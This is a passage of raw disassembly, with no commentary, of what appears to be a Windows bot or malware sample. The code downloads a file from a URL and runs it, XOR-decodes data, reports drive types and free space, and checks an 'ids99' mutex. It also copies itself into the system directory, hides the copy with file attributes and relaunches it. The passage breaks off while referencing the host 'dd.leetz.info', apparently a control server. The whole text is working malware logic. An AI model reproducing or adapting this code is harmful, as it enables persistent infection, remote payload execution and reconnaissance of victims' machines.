loc_40BBD9: ; CODE XREF: sub_40B9BC+212�j
cmp [ebp+arg_0], ebx
jbe short loc_40BBE7
push [ebp+arg_0]
call dword_43CABC ; closesocket
loc_40BBE7: ; CODE XREF: sub_40B9BC+220�j
push [ebp+var_1C]
call sub_4150F0
pop ecx
push ebx
call dword_421048 ; ExitThread
sub_40B9BC endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40BBF7 proc near ; DATA XREF: sub_40CD3A+3646�o
; sub_40CD3A+3DA2�o
var_590 = qword ptr -590h
var_584 = qword ptr -584h
var_510 = byte ptr -510h
var_310 = dword ptr -310h
var_304 = dword ptr -304h
var_2E4 = dword ptr -2E4h
var_2E0 = word ptr -2E0h
var_2CC = dword ptr -2CCh
var_2C8 = byte ptr -2C8h
var_248 = byte ptr -248h
var_148 = byte ptr -148h
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_24 = byte ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = byte ptr -10h
var_8 = qword ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 510h
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
mov ecx, 0AAh
mov esi, eax
lea edi, [ebp+var_2CC]
rep movsd
xor edi, edi
xor esi, esi
inc edi
push esi
mov [eax+2A4h], edi
push esi
push esi
lea eax, [ebp+var_248]
push esi
push eax
push dword_43C9D4
call dword_43C934 ; InternetOpenUrlA
cmp eax, esi
mov [ebp+var_18], eax
jz loc_40C070
push esi
push esi
push 2
push esi
push esi
lea eax, [ebp+var_148]
push 40000000h
push eax
call dword_421078 ; CreateFileA
cmp eax, edi
mov [ebp+var_20], eax
jnb short loc_40BCBE
lea eax, [ebp+var_148]
push eax
lea eax, [ebp+var_510]
push offset unk_42C114
push eax
call sub_415316
add esp, 0Ch
cmp [ebp+var_30], esi
jnz short loc_40BCA1
push esi
lea eax, [ebp+var_510]
push [ebp+var_2C]
push eax
lea eax, [ebp+var_2C8]
push eax
push [ebp+var_2CC]
call sub_412BD1
add esp, 14h
loc_40BCA1: ; CODE XREF: sub_40BBF7+88�j
lea eax, [ebp+var_510]
push eax
call sub_40B078
push [ebp+var_48]
call sub_4150F0
pop ecx
pop ecx
push esi
call dword_421048 ; ExitThread
loc_40BCBE: ; CODE XREF: sub_40BBF7+68�j
xor edi, edi
call dword_42104C ; GetTickCount
mov ebx, 7D000h
mov dword ptr [ebp+var_8+4], eax
push ebx
call sub_415BE9
pop ecx
mov [ebp+var_1C], eax
loc_40BCD8: ; CODE XREF: sub_40BBF7+1A9�j
push 200h
lea eax, [ebp+var_510]
push esi
push eax
call sub_415390
add esp, 0Ch
lea eax, [ebp+arg_0]
push eax
lea eax, [ebp+var_510]
push 200h
push eax
push [ebp+var_18]
call dword_43C93C ; InternetReadFile
cmp [ebp+var_34], esi
jz short loc_40BD1C
push [ebp+arg_0]
lea eax, [ebp+var_510]
push eax
call sub_40C0D6
pop ecx
pop ecx
loc_40BD1C: ; CODE XREF: sub_40BBF7+112�j
lea eax, [ebp+var_24]
push esi
push eax
lea eax, [ebp+var_510]
push [ebp+arg_0]
push eax
push [ebp+var_20]
call dword_421070 ; WriteFile
cmp edi, ebx
jnb short loc_40BD5A
mov eax, ebx
sub eax, edi
cmp eax, [ebp+arg_0]
jbe short loc_40BD44
mov eax, [ebp+arg_0]
loc_40BD44: ; CODE XREF: sub_40BBF7+148�j
push eax
lea eax, [ebp+var_510]
push eax
mov eax, [ebp+var_1C]
add eax, edi
push eax
call sub_4153F0
add esp, 0Ch
loc_40BD5A: ; CODE XREF: sub_40BBF7+13F�j
add edi, [ebp+arg_0]
cmp [ebp+var_3C], esi
jz short loc_40BD67
cmp edi, [ebp+var_3C]
ja short loc_40BDA6
loc_40BD67: ; CODE XREF: sub_40BBF7+169�j
mov eax, edi
shr eax, 0Ah
push eax
lea eax, [ebp+var_248]
push eax
mov eax, [ebp+var_48]
imul eax, 234h
add eax, offset dword_441998
cmp [ebp+var_44], 1
jz short loc_40BD8F
push offset unk_42C0C8
jmp short loc_40BD94
; ---------------------------------------------------------------------------
loc_40BD8F: ; CODE XREF: sub_40BBF7+18F�j
push offset unk_42C080
loc_40BD94: ; CODE XREF: sub_40BBF7+196�j
push eax
call sub_415316
add esp, 10h
cmp [ebp+arg_0], esi
ja loc_40BCD8
loc_40BDA6: ; CODE XREF: sub_40BBF7+16E�j
cmp [ebp+var_3C], esi
mov [ebp+var_14], 1
jz short loc_40BDFB
cmp edi, [ebp+var_3C]
jz short loc_40BDFB
push [ebp+var_3C]
lea eax, [ebp+var_510]
mov [ebp+var_14], esi
push edi
push offset unk_42C038
push eax
call sub_415316
push esi
lea eax, [ebp+var_510]
push [ebp+var_2C]
push eax
lea eax, [ebp+var_2C8]
push eax
push [ebp+var_2CC]
call sub_412BD1
lea eax, [ebp+var_510]
push eax
call sub_40B078
add esp, 28h
loc_40BDFB: ; CODE XREF: sub_40BBF7+1B9�j
; sub_40BBF7+1BE�j
call dword_42104C ; GetTickCount
sub eax, dword ptr [ebp+var_8+4]
xor edx, edx
mov ecx, 3E8h
push [ebp+var_20]
div ecx
xor edx, edx
mov ecx, eax
mov eax, edi
inc ecx
div ecx
mov ebx, eax
call dword_42106C ; CloseHandle
push [ebp+var_1C]
call sub_415C9B
cmp [ebp+var_38], esi
pop ecx
jz short loc_40BE85
lea eax, [ebp+var_148]
push eax
call sub_40B363
cmp eax, [ebp+var_38]
pop ecx
jz short loc_40BE85
push [ebp+var_38]
mov [ebp+var_14], esi
push eax
lea eax, [ebp+var_510]
push offset unk_42BFFC
push eax
call sub_415316
push esi
lea eax, [ebp+var_510]
push [ebp+var_2C]
push eax
lea eax, [ebp+var_2C8]
push eax
push [ebp+var_2CC]
call sub_412BD1
lea eax, [ebp+var_510]
push eax
call sub_40B078
add esp, 28h
loc_40BE85: ; CODE XREF: sub_40BBF7+236�j
; sub_40BBF7+248�j
cmp [ebp+var_14], esi
jz loc_40C0BD
cmp [ebp+var_44], 1
push ecx
lea eax, [ebp+var_148]
push ecx
jz loc_40BF80
mov dword ptr [ebp+var_8], ebx
mov dword ptr [ebp+var_8+4], esi
fild [ebp+var_8]
mov dword ptr [ebp+var_8], edi
mov dword ptr [ebp+var_8+4], esi
fmul dbl_421660
fstp [esp+584h+var_584]
fild [ebp+var_8]
push eax
push ecx
push ecx
lea eax, [ebp+var_510]
fmul dbl_421660
fstp [esp+590h+var_590]
push offset unk_42BFB0
push eax
call sub_415316
add esp, 1Ch
cmp [ebp+var_30], esi
jnz short loc_40BF00
push esi
lea eax, [ebp+var_510]
push [ebp+var_2C]
push eax
lea eax, [ebp+var_2C8]
push eax
push [ebp+var_2CC]
call sub_412BD1
add esp, 14h
loc_40BF00: ; CODE XREF: sub_40BBF7+2E7�j
lea eax, [ebp+var_510]
push eax
call sub_40B078
cmp [ebp+var_40], 1
pop ecx
jnz loc_40C0BD
push 5
push esi
lea eax, [ebp+var_148]
push esi
push eax
push offset aOpen ; "open"
push esi
call dword_43C998 ; ShellExecuteA
cmp [ebp+var_30], esi
jnz loc_40C0BD
lea eax, [ebp+var_148]
push eax
lea eax, [ebp+var_510]
push offset dword_42BF74
push eax
call sub_415316
push esi
lea eax, [ebp+var_510]
push [ebp+var_2C]
push eax
lea eax, [ebp+var_2C8]
push eax
push [ebp+var_2CC]
call sub_412BD1
lea eax, [ebp+var_510]
push eax
call sub_40B078
add esp, 24h
jmp loc_40C0BD
; ---------------------------------------------------------------------------
loc_40BF80: ; CODE XREF: sub_40BBF7+2A3�j
mov dword ptr [ebp+var_8], ebx
mov dword ptr [ebp+var_8+4], esi
fild [ebp+var_8]
mov dword ptr [ebp+var_8], edi
mov dword ptr [ebp+var_8+4], esi
fmul dbl_421660
fstp [esp+584h+var_584]
fild [ebp+var_8]
push eax
push ecx
push ecx
lea eax, [ebp+var_510]
fmul dbl_421660
fstp [esp+590h+var_590]
push offset unk_42BF20
push eax
call sub_415316
add esp, 1Ch
cmp [ebp+var_30], esi
jnz short loc_40BFE0
push esi
lea eax, [ebp+var_510]
push [ebp+var_2C]
push eax
lea eax, [ebp+var_2C8]
push eax
push [ebp+var_2CC]
call sub_412BD1
add esp, 14h
loc_40BFE0: ; CODE XREF: sub_40BBF7+3C7�j
lea eax, [ebp+var_510]
push eax
call sub_40B078
push 10h
lea eax, [ebp+var_10]
push esi
push eax
call sub_415390
push 44h
lea eax, [ebp+var_310]
pop edi
push edi
push esi
push eax
call sub_415390
add esp, 1Ch
lea eax, [ebp+var_10]
mov [ebp+var_310], edi
xor edi, edi
push eax
lea eax, [ebp+var_310]
push eax
push esi
push esi
push 28h
push esi
push esi
lea eax, [ebp+var_148]
push esi
inc edi
push eax
push esi
mov [ebp+var_304], offset byte_43B658
mov [ebp+var_2E4], edi
mov [ebp+var_2E0], si
call dword_4210EC ; CreateProcessA
cmp eax, edi
jnz short loc_40C062
call dword_43C984 ; WSACleanup
call sub_409D34
push esi
call dword_421114 ; ExitProcess
loc_40C062: ; CODE XREF: sub_40BBF7+457�j
lea eax, [ebp+var_148]
push eax
push offset unk_42BED0
jmp short loc_40C07C
; ---------------------------------------------------------------------------
loc_40C070: ; CODE XREF: sub_40BBF7+45�j
lea eax, [ebp+var_248]
push eax
push offset unk_42BE8C
loc_40C07C: ; CODE XREF: sub_40BBF7+477�j
lea eax, [ebp+var_510]
push eax
call sub_415316
add esp, 0Ch
cmp [ebp+var_30], esi
jnz short loc_40C0B0
push esi
lea eax, [ebp+var_510]
push [ebp+var_2C]
push eax
lea eax, [ebp+var_2C8]
push eax
push [ebp+var_2CC]
call sub_412BD1
add esp, 14h
loc_40C0B0: ; CODE XREF: sub_40BBF7+497�j
lea eax, [ebp+var_510]
push eax
call sub_40B078
pop ecx
loc_40C0BD: ; CODE XREF: sub_40BBF7+291�j
; sub_40BBF7+31A�j ...
push [ebp+var_18]
call dword_43CA58 ; InternetCloseHandle
push [ebp+var_48]
call sub_4150F0
pop ecx
push esi
call dword_421048 ; ExitThread
sub_40BBF7 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_40C0D6 proc near ; CODE XREF: sub_40BBF7+11E�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_0]
xor ecx, ecx
cmp [esp+arg_4], ecx
jle short locret_40C0F2
loc_40C0E2: ; CODE XREF: sub_40C0D6+1A�j
mov dl, byte_42C258
xor [ecx+eax], dl
inc ecx
cmp ecx, [esp+arg_4]
jl short loc_40C0E2
locret_40C0F2: ; CODE XREF: sub_40C0D6+A�j
retn
sub_40C0D6 endp
; =============== S U B R O U T I N E =======================================
sub_40C0F3 proc near ; CODE XREF: sub_40CD3A+2878�p
; sub_40CD3A+29E5�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push [esp+arg_4]
push [esp+4+arg_0]
call sub_417729
pop ecx
pop ecx
xor ecx, ecx
cmp eax, 0FFFFFFFFh
setnz cl
mov eax, ecx
retn
sub_40C0F3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40C10D proc near ; CODE XREF: sub_4062F7+462�p
; sub_4062F7+5FE�p ...
var_38 = byte ptr -38h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 38h
and [ebp+var_4], 0
push ebx
push esi
push edi
push 32h
mov edi, offset dword_440DE0
push 0
push edi
call sub_415390
mov ebx, [ebp+arg_0]
add esp, 0Ch
lea esi, [ebp+var_38]
loc_40C132: ; CODE XREF: sub_40C10D+5B�j
; sub_40C10D+61�j
push 0
push 0Ah
push [ebp+arg_4]
push ebx
call sub_417100
push 0
push 0Ah
push [ebp+arg_4]
add al, 30h
mov [esi], al
inc esi
push ebx
call sub_417180
mov ebx, eax
or eax, edx
mov [ebp+arg_4], edx
jz short loc_40C170
inc [ebp+var_4]
push 3
mov eax, [ebp+var_4]
pop ecx
cdq
idiv ecx
test edx, edx
jnz short loc_40C132
mov byte ptr [esi], 2Ch
inc esi
jmp short loc_40C132
; ---------------------------------------------------------------------------
loc_40C170: ; CODE XREF: sub_40C10D+4B�j
mov eax, edi
jmp short loc_40C179
; ---------------------------------------------------------------------------
loc_40C174: ; CODE XREF: sub_40C10D+72�j
mov cl, [esi]
mov [eax], cl
inc eax
loc_40C179: ; CODE XREF: sub_40C10D+65�j
dec esi
lea ecx, [ebp+var_38]
cmp esi, ecx
jnb short loc_40C174
and byte ptr [eax], 0
mov eax, edi
pop edi
pop esi
pop ebx
leave
retn
sub_40C10D endp
; =============== S U B R O U T I N E =======================================
sub_40C18B proc near ; CODE XREF: sub_40C337+51�p
; sub_40C337+87�p
arg_0 = dword ptr 4
push [esp+arg_0]
call dword_43CA84 ; GetDriveTypeA
sub eax, 0
jz short loc_40C1CE
dec eax
jz short loc_40C1C8
dec eax
dec eax
jz short loc_40C1C2
dec eax
jz short loc_40C1BC
dec eax
jz short loc_40C1B6
dec eax
jz short loc_40C1B0
mov eax, offset word_42B85C
retn
; ---------------------------------------------------------------------------
loc_40C1B0: ; CODE XREF: sub_40C18B+1D�j
mov eax, offset aRam ; "RAM"
retn
; ---------------------------------------------------------------------------
loc_40C1B6: ; CODE XREF: sub_40C18B+1A�j
mov eax, offset aCdrom ; "Cdrom"
retn
; ---------------------------------------------------------------------------
loc_40C1BC: ; CODE XREF: sub_40C18B+17�j
mov eax, offset aNetwork ; "Network"
retn
; ---------------------------------------------------------------------------
loc_40C1C2: ; CODE XREF: sub_40C18B+14�j
mov eax, offset aDisk ; "Disk"
retn
; ---------------------------------------------------------------------------
loc_40C1C8: ; CODE XREF: sub_40C18B+10�j
mov eax, offset aInvalid ; "Invalid"
retn
; ---------------------------------------------------------------------------
loc_40C1CE: ; CODE XREF: sub_40C18B+D�j
mov eax, offset aUnknown ; "Unknown"
retn
sub_40C18B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40C1D4 proc near ; CODE XREF: sub_40C21C+12�p
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 18h
or eax, 0FFFFFFFFh
mov [ebp+var_18], eax
mov [ebp+var_14], eax
mov [ebp+var_10], eax
mov [ebp+var_C], eax
mov [ebp+var_8], eax
mov [ebp+var_4], eax
mov eax, dword_43C920
test eax, eax
jz short loc_40C209
lea ecx, [ebp+var_10]
push ecx
lea ecx, [ebp+var_8]
push ecx
lea ecx, [ebp+var_18]
push ecx
push [ebp+arg_4]
call eax ; GetDiskFreeSpaceExA
loc_40C209: ; CODE XREF: sub_40C1D4+22�j
mov eax, [ebp+arg_0]
push esi
push edi
push 6
pop ecx
lea esi, [ebp+var_18]
mov edi, eax
rep movsd
pop edi
pop esi
leave
retn
sub_40C1D4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40C21C proc near ; CODE XREF: sub_40A9D8+1F3�p
; sub_40C337+17�p
var_198 = byte ptr -198h
var_118 = byte ptr -118h
var_98 = byte ptr -98h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 198h
push esi
push edi
push [ebp+arg_4]
lea eax, [ebp+var_18]
push eax
call sub_40C1D4
pop ecx
mov esi, eax
pop ecx
lea edi, [ebp+var_18]
push 6
pop ecx
rep movsd
mov eax, [ebp+var_18]
and eax, [ebp+var_14]
cmp eax, 0FFFFFFFFh
jz loc_40C2F4
mov eax, [ebp+var_10]
and eax, [ebp+var_C]
cmp eax, 0FFFFFFFFh
jz loc_40C2F4
mov eax, [ebp+var_8]
and eax, [ebp+var_4]
cmp eax, 0FFFFFFFFh
jz loc_40C2F4
push ebx
mov ebx, 400h
push 0
push ebx
push [ebp+var_14]
push [ebp+var_18]
call sub_417770
push edx
push eax
call sub_40C10D
mov edi, offset aSkb ; "%sKB"
push eax
mov esi, 80h
push edi
lea eax, [ebp+var_198]
push esi
push eax
call sub_41588A
add esp, 18h
push 0
push ebx
push [ebp+var_C]
push [ebp+var_10]
call sub_417770
push edx
push eax
call sub_40C10D
push eax
push edi
lea eax, [ebp+var_118]
push esi
push eax
call sub_41588A
add esp, 18h
push 0
push ebx
push [ebp+var_4]
push [ebp+var_8]
call sub_417770
push edx
push eax
call sub_40C10D
push eax
push edi
lea eax, [ebp+var_98]
push esi
push eax
call sub_41588A
add esp, 18h
pop ebx
jmp short loc_40C323
; ---------------------------------------------------------------------------
loc_40C2F4: ; CODE XREF: sub_40C21C+2C�j
; sub_40C21C+3B�j ...
mov esi, offset aFailed ; "failed"
lea eax, [ebp+var_198]
push esi
push eax
call sub_415316
lea eax, [ebp+var_118]
push esi
push eax
call sub_415316
lea eax, [ebp+var_98]
push esi
push eax
call sub_415316
add esp, 18h
loc_40C323: ; CODE XREF: sub_40C21C+D6�j
mov eax, [ebp+arg_0]
push 60h
pop ecx
lea esi, [ebp+var_198]
mov edi, eax
rep movsd
pop edi
pop esi
leave
retn
sub_40C21C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40C337 proc near ; CODE XREF: sub_40C409+17�p
; sub_40C409+60�p
var_500 = byte ptr -500h
var_300 = byte ptr -300h
var_180 = byte ptr -180h
var_100 = byte ptr -100h
var_80 = byte ptr -80h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 500h
push ebx
mov ebx, [ebp+arg_C]
push esi
push edi
lea eax, [ebp+var_300]
push ebx
push eax
call sub_40C21C
push 60h
mov esi, eax
pop ecx
lea edi, [ebp+var_300]
rep movsd
push 60h
lea esi, [ebp+var_300]
pop ecx
lea edi, [ebp+var_180]
lea eax, [ebp+var_80]
push offset aFailed ; "failed"
rep movsd
push eax
call sub_415730
add esp, 10h
test eax, eax
jnz short loc_40C3AA
push ebx
push ebx
call sub_40C18B
pop ecx
push eax
push offset dword_42C1E0
lea eax, [ebp+var_500]
push 200h
push eax
call sub_41588A
add esp, 14h
jmp short loc_40C3DE
; ---------------------------------------------------------------------------
loc_40C3AA: ; CODE XREF: sub_40C337+4D�j
lea eax, [ebp+var_180]
push eax
lea eax, [ebp+var_100]
push eax
lea eax, [ebp+var_80]
push eax
push ebx
push ebx
call sub_40C18B
pop ecx
push eax
push offset dword_42C190
lea eax, [ebp+var_500]
push 200h
push eax
call sub_41588A
add esp, 20h
loc_40C3DE: ; CODE XREF: sub_40C337+71�j
push 1
lea eax, [ebp+var_500]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_412BD1
lea eax, [ebp+var_500]
push eax
call sub_40B078
add esp, 18h
pop edi
pop esi
pop ebx
leave
retn
sub_40C337 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40C409 proc near ; CODE XREF: sub_40CD3A+51BE�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ebx
xor ebx, ebx
cmp [ebp+arg_C], ebx
jz short loc_40C42A
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40C337
add esp, 10h
jmp short loc_40C489
; ---------------------------------------------------------------------------
loc_40C42A: ; CODE XREF: sub_40C409+9�j
push esi
push edi
push ebx
push ebx
call dword_43C994 ; GetLogicalDriveStringsA
lea esi, [eax+2]
push esi
call sub_415BE9
pop ecx
mov edi, eax
push edi
push esi
call dword_43C994 ; GetLogicalDriveStringsA
cmp [edi], bl
mov esi, edi
jz short loc_40C480
loc_40C44E: ; CODE XREF: sub_40C409+75�j
push offset aA_1 ; "A:\\"
push esi
call sub_415730
pop ecx
test eax, eax
pop ecx
jz short loc_40C471
push esi
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40C337
add esp, 10h
loc_40C471: ; CODE XREF: sub_40C409+54�j
push esi
call sub_415B10
lea esi, [esi+eax+1]
pop ecx
cmp [esi], bl
jnz short loc_40C44E
loc_40C480: ; CODE XREF: sub_40C409+43�j
push edi
call sub_415C9B
pop ecx
pop edi
pop esi
loc_40C489: ; CODE XREF: sub_40C409+1F�j
pop ebx
pop ebp
retn
sub_40C409 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40C48C proc near ; DATA XREF: sub_40C574+11�o
var_2B8 = dword ptr -2B8h
var_25C = byte ptr -25Ch
var_158 = byte ptr -158h
var_54 = dword ptr -54h
var_48 = dword ptr -48h
var_28 = dword ptr -28h
var_24 = word ptr -24h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 25Ch
push ebx
push esi
push edi
push dword_441BA4
call dword_43CABC ; closesocket
call sub_414F9D
call dword_43C984 ; WSACleanup
call dword_43C984 ; WSACleanup
mov ebx, dword_421060
push 64h
call ebx ; Sleep
xor edi, edi
push 10h
lea eax, [ebp+var_10]
push edi
push eax
call sub_415390
push 44h
lea eax, [ebp+var_54]
pop esi
push esi
push edi
push eax
call sub_415390
add esp, 18h
mov [ebp+var_54], esi
mov esi, 104h
lea eax, [ebp+var_25C]
push esi
push eax
mov [ebp+var_48], offset byte_43B658
mov [ebp+var_28], 1
mov [ebp+var_24], di
call dword_421058 ; GetSystemDirectoryA
lea eax, [ebp+var_158]
push esi
push eax
push edi
call dword_42107C ; GetModuleFileNameA
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_54]
push eax
lea eax, [ebp+var_25C]
push eax
push edi
push 28h
push 1
push edi
lea eax, [ebp+var_158]
push edi
push eax
push edi
call dword_4210EC ; CreateProcessA
test eax, eax
jz short loc_40C551
push 64h
call ebx ; Sleep
push [ebp+var_10]
mov esi, dword_42106C
call esi ; CloseHandle
push [ebp+var_C]
call esi ; CloseHandle
loc_40C551: ; CODE XREF: sub_40C48C+AF�j
mov eax, [ebp+arg_8]
mov dword ptr [eax+0B0h], offset dword_440E14
mov eax, [esp+2B8h+var_2B8]
mov large fs:0, eax
add esp, 8
push edi
call dword_421114 ; ExitProcess
pop edi
pop esi
pop ebx
sub_40C48C endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40C574 proc near ; CODE XREF: .text:00417BE1�p
var_988 = byte ptr -988h
var_884 = byte ptr -884h
var_883 = byte ptr -883h
var_6F4 = byte ptr -6F4h
var_5F4 = byte ptr -5F4h
var_4F0 = byte ptr -4F0h
var_3F0 = byte ptr -3F0h
var_2EC = byte ptr -2ECh
var_1E8 = byte ptr -1E8h
var_E4 = byte ptr -0E4h
var_64 = dword ptr -64h
var_58 = dword ptr -58h
var_38 = dword ptr -38h
var_34 = word ptr -34h
var_20 = byte ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 988h
push ebx
xor ebx, ebx
push esi
push edi
mov [ebp+var_C], ebx
mov [ebp+var_8], offset sub_40C48C
push [ebp+var_8]
push large dword ptr fs:0
mov large fs:0, esp
cmp dword_42C24C, ebx
jz short loc_40C5AA
call sub_409EBC
loc_40C5AA: ; CODE XREF: sub_40C574+2F�j
mov esi, dword_42104C
call esi ; GetTickCount
xor edx, edx
mov ecx, 3E8h
div ecx
mov dword_46AE88, eax
call esi ; GetTickCount
push eax
call sub_415368
pop ecx
call sub_40891C
push 2
call dword_43CAD0 ; SetErrorMode
push 7530h
push offset aIds99 ; "ids99"
push ebx
push ebx
call dword_42112C ; CreateMutexA
push eax
call dword_421128 ; WaitForSingleObject
cmp eax, 102h
jnz short loc_40C5FE
push 1
call dword_421114 ; ExitProcess
loc_40C5FE: ; CODE XREF: sub_40C574+80�j
lea eax, [ebp+var_884]
push eax
push 202h
call dword_43C99C ; WSAStartup
cmp eax, ebx
mov [ebp+var_8], eax
jnz loc_40CA4F
cmp [ebp+var_884], 2
jnz loc_40CA49
xor eax, eax
mov al, [ebp+var_883]
cmp al, 2
jnz loc_40CA49
mov esi, 104h
lea eax, [ebp+var_3F0]
push esi
push eax
call dword_421058 ; GetSystemDirectoryA
lea eax, [ebp+var_2EC]
push esi
push eax
push ebx
call dword_4210C8 ; GetModuleHandleA
push eax
call dword_42107C ; GetModuleFileNameA
lea eax, [ebp+var_4F0]
push eax
lea eax, [ebp+var_6F4]
push eax
push ebx
lea eax, [ebp+var_2EC]
push ebx
push eax
call sub_4171E8
lea eax, [ebp+var_4F0]
push eax
lea eax, [ebp+var_6F4]
push eax
push offset aSS_2 ; "%s%s"
lea eax, [ebp+var_5F4]
push esi
push eax
call sub_41588A
lea eax, [ebp+var_3F0]
push eax
lea eax, [ebp+var_2EC]
push eax
call sub_4158E0
add esp, 30h
test eax, eax
jnz loc_40C852
cmp dword_46AFF4, ebx
mov esi, offset byte_42C2B4
jz short loc_40C6F9
push esi
xor edi, edi
call sub_415B10
sub eax, 4
pop ecx
jz short loc_40C6F9
loc_40C6D6: ; CODE XREF: sub_40C574+183�j
call sub_415372
push 1Ah
cdq
pop ecx
idiv ecx
push esi
add dl, 61h
mov byte_42C2B4[edi], dl
inc edi
call sub_415B10
sub eax, 4
pop ecx
cmp edi, eax
jb short loc_40C6D6
loc_40C6F9: ; CODE XREF: sub_40C574+152�j
; sub_40C574+160�j
lea eax, [ebp+var_3F0]
push esi
push eax
lea eax, [ebp+var_1E8]
push offset aSS_3 ; "%s\\%s"
push eax
call sub_415316
add esp, 10h
lea eax, [ebp+var_1E8]
push eax
call dword_421094 ; GetFileAttributesA
cmp eax, 0FFFFFFFFh
jz short loc_40C739
lea eax, [ebp+var_1E8]
push 80h
push eax
call dword_4210F4 ; SetFileAttributesA
loc_40C739: ; CODE XREF: sub_40C574+1B1�j
mov esi, dword_421124
xor edi, edi
jmp short loc_40C765
; ---------------------------------------------------------------------------
loc_40C743: ; CODE XREF: sub_40C574+204�j
call dword_421088 ; RtlGetLastWin32Error
cmp edi, ebx
jnz short loc_40C77A
cmp eax, 20h
jz short loc_40C757
cmp eax, 5
jnz short loc_40C77A
loc_40C757: ; CODE XREF: sub_40C574+1DC�j
xor edi, edi
push 3A98h
inc edi
call dword_421060 ; Sleep
loc_40C765: ; CODE XREF: sub_40C574+1CD�j
lea eax, [ebp+var_1E8]
push ebx
push eax
lea eax, [ebp+var_2EC]
push eax
call esi ; CopyFileA
test eax, eax
jz short loc_40C743
loc_40C77A: ; CODE XREF: sub_40C574+1D7�j
; sub_40C574+1E1�j
lea eax, [ebp+var_1E8]
push eax
call sub_409C6E
pop ecx
lea eax, [ebp+var_1E8]
push 7
push eax
call dword_4210F4 ; SetFileAttributesA
push 10h
lea eax, [ebp+var_1C]
push ebx
push eax
call sub_415390
push 44h
lea eax, [ebp+var_64]
pop esi
push esi
push ebx
push eax
call sub_415390
mov [ebp+var_64], esi
xor esi, esi
inc esi
add esp, 18h
mov [ebp+var_58], offset byte_43B658
mov [ebp+var_38], esi
mov [ebp+var_34], bx
call dword_421120 ; GetCurrentProcessId
push eax
push esi
push 100000h
call dword_42111C ; OpenProcess
lea ecx, [ebp+var_2EC]
push ecx
push eax
lea eax, [ebp+var_1E8]
push eax
lea eax, [ebp+var_988]
push offset dword_43372C
push eax
call sub_415316
add esp, 14h
lea eax, [ebp+var_1C]
push eax
lea eax, [ebp+var_64]
push eax
lea eax, [ebp+var_3F0]
push eax
push ebx
push 28h
push esi
push ebx
lea eax, [ebp+var_988]
push ebx
push eax
lea eax, [ebp+var_1E8]
push eax
call dword_4210EC ; CreateProcessA
test eax, eax
jz short loc_40C852
push 0C8h
call dword_421060 ; Sleep
push [ebp+var_1C]
mov esi, dword_42106C
call esi ; CloseHandle
push [ebp+var_18]
call esi ; CloseHandle
call dword_43C984 ; WSACleanup
push ebx
call dword_421114 ; ExitProcess
loc_40C852: ; CODE XREF: sub_40C574+141�j
; sub_40C574+2B4�j
cmp dword_46BB20, 2
jle short loc_40C89E
mov eax, dword_46BB24
push dword ptr [eax+4]
call sub_41587F
pop ecx
mov esi, eax
push 0FFFFFFFFh
push esi
call dword_421128 ; WaitForSingleObject
push esi
call dword_42106C ; CloseHandle
mov eax, dword_46BB24
cmp [eax+8], ebx
jz short loc_40C89E
push 7D0h
call dword_421060 ; Sleep
mov eax, dword_46BB24
push dword ptr [eax+8]
call dword_421118 ; DeleteFileA
loc_40C89E: ; CODE XREF: sub_40C574+2E5�j
; sub_40C574+30F�j
cmp dword_42C254, ebx
jz short loc_40C8BB
cmp dword_43CAF0, ebx
jnz short loc_40C8BB
lea eax, [ebp+var_5F4]
push eax
call sub_40B2B9
pop ecx
loc_40C8BB: ; CODE XREF: sub_40C574+330�j
; sub_40C574+338�j
lea eax, [ebp+var_E4]
push offset dword_433700
push eax
call sub_415316
push ebx
lea eax, [ebp+var_E4]
push ebx
push eax
call sub_414DDA
lea eax, [ebp+var_E4]
push eax
call sub_40B078
push 0B80h
push ebx
push offset dword_440E18
call sub_415390
call sub_415372
push 7Fh
push offset aDd_leetz_info ; "dd.leetz.info"
